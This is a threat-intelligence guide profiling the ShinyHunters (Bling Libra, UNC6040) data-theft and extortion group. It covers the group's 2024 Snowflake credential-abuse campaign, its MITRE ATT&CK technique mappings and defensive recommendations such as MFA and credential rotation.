TI News Feed · Threat Intelligence Guides

ShinyHunters (Bling Libra): Threat Actor Profile

ShinyHunters is a data-theft-first actor that graduated from database trading to broad extortion, driving the Snowflake breach wave that hit Ticketmaster, Santander, and others. A full threat-actor profile.

Reviewed & fact-checked against primary sources by the TI News Feed Editorial Team. See our editorial & corrections policy.

ShinyHunters is one of the clearest examples of a data-theft-first threat actor graduating from credential and database trading into broad extortion relevance. Public reporting links the name to major database data breaches, Salesforce-linked intrusions, and the large Snowflake customer wave that hit Ticketmaster, Santander, and others.

ShinyHunters: at a glance

  • Aliases: ShinyHunters, Bling Libra, UNC6040
  • Country / affiliation: International cybercrime; loose transnational ecosystem rather than a single state sponsor
  • Assessed status (as of July 2026): Likely active
  • Primary objectives: Data theft, resale, extortion, credential abuse, and database exposure
  • Financial destruction / gain: No single clean public payout total; damage is real but hard to normalize into a payment figure
  • Type: Data-theft and extortion crew (SaaS/cloud)

Who is ShinyHunters?

The challenge is that public financial accounting is weak compared with ransomware groups: the damage is very real, but hard to normalize into a clean payment figure. The most defensible 2026 call is 'likely active,' but with an incomplete public picture.

Aliases and attribution

ShinyHunters is a cybercriminal group placed by public reporting in a loose transnational ecosystem rather than under a single state sponsor, tracked as Bling Libra (Palo Alto Unit 42) and UNC6040 (Mandiant). It has reportedly overlapped or collaborated with Scattered Spider in 2025 Salesforce-focused campaigns, per Obsidian Security — a reminder that cybercrime cyber attribution is fluid.

Financial impact and damage

There is no single clean payout total, but ShinyHunters' volume of leaked data breach records is staggering. The 2024 Snowflake-linked wave reportedly affected around 165 customer accounts, including major breaches such as Ticketmaster (560M records) and a large telecom. Its model — steal data using stolen credentials, then extort or resell on cybercrime forums — makes it a persistent SaaS/cloud data-theft threat.

ShinyHunters timeline

  • 2020: Credential and database-theft notoriety on cybercrime forums
  • 2024: Snowflake-linked customer compromises publicized (Ticketmaster, Santander, AT&T)
  • 2025: Google-linked warning reporting and Salesforce-focused campaigns keep the group current

Notable attacks and campaigns

The 2024 Snowflake campaign exploited customer accounts that lacked multi-factor authentication, using credentials harvested by infostealer malware to export vast databases — one of the largest data-theft waves on record. ShinyHunters then extorted victims and listed stolen data for sale, blurring the line between breach broker and extortion crew.

Tactics, techniques, and procedures (TTPs)

The techniques below are compact, high-confidence mappings to the MITRE ATT&CK framework, drawn from the group's MITRE ATT&CK profile and corroborating government and vendor reporting. The live ATT&CK matrix remains the authoritative reference for full coverage.

  • T1078 — Valid Accounts: The Snowflake wave used stolen or plaintext credentials, often infostealer-derived. Require MFA everywhere, rotate service credentials, and invalidate legacy plaintext secrets.
  • T1555 / infostealer — Credentials from stores and contractor environments: Reporting links the campaign to infostealer-derived access and contractor compromise. Hunt for infostealer artifacts and unusual contractor privilege chains.
  • T1530 / T1567 — Data from Cloud Storage / Exfiltration to Web Services: Snowflake intrusions were large-scale data-extraction operations. Monitor bulk export jobs, unusual warehouse queries, and outbound archive transfer to unsanctioned storage.

Detection and defense against ShinyHunters

ShinyHunters relies almost entirely on stolen credentials against MFA-less cloud accounts, so identity is the whole game:

  • Require MFA on every SaaS and cloud data platform — the Snowflake wave hit accounts without it.
  • Rotate service credentials and invalidate legacy plaintext secrets in Jira, code repos, and configs.
  • Hunt for infostealer artifacts and browser-secret theft on endpoints and contractor hosts.
  • Monitor bulk export jobs, unusual warehouse queries, and mass download behavior.
  • Alert on outbound archive transfer to unsanctioned cloud storage and leak-site prep indicators.

The bottom line

ShinyHunters shows how stolen credentials plus MFA-less cloud platforms can produce record-breaking breaches without any malware — making identity hygiene the decisive defense. See how ShinyHunters ranks among the most dangerous threat actors, and track its latest activity on our live threat intelligence feed, aggregated from dozens of authoritative sources.

Frequently asked questions

Who is ShinyHunters?

ShinyHunters is an international cybercrime group, also tracked as Bling Libra and UNC6040, specializing in stealing and reselling large databases from SaaS and cloud platforms, and behind the 2024 Snowflake breach wave.

What was the Snowflake breach?

In 2024, ShinyHunters used stolen credentials (often infostealer-derived) to access around 165 Snowflake customer accounts lacking MFA, exfiltrating huge databases including Ticketmaster and Santander data.

How does ShinyHunters make money?

By stealing data with compromised credentials, then extorting victims and reselling the stolen databases on cybercrime forums. Its financial totals are harder to quantify than ransomware ransoms.

Is ShinyHunters still active?

Likely yes. Reporting through 2025, including Salesforce-focused campaigns and Google warnings, indicates continued activity, though the public picture is incomplete.

Primary sources & further reading

This guide is reviewed and fact-checked against authoritative primary sources: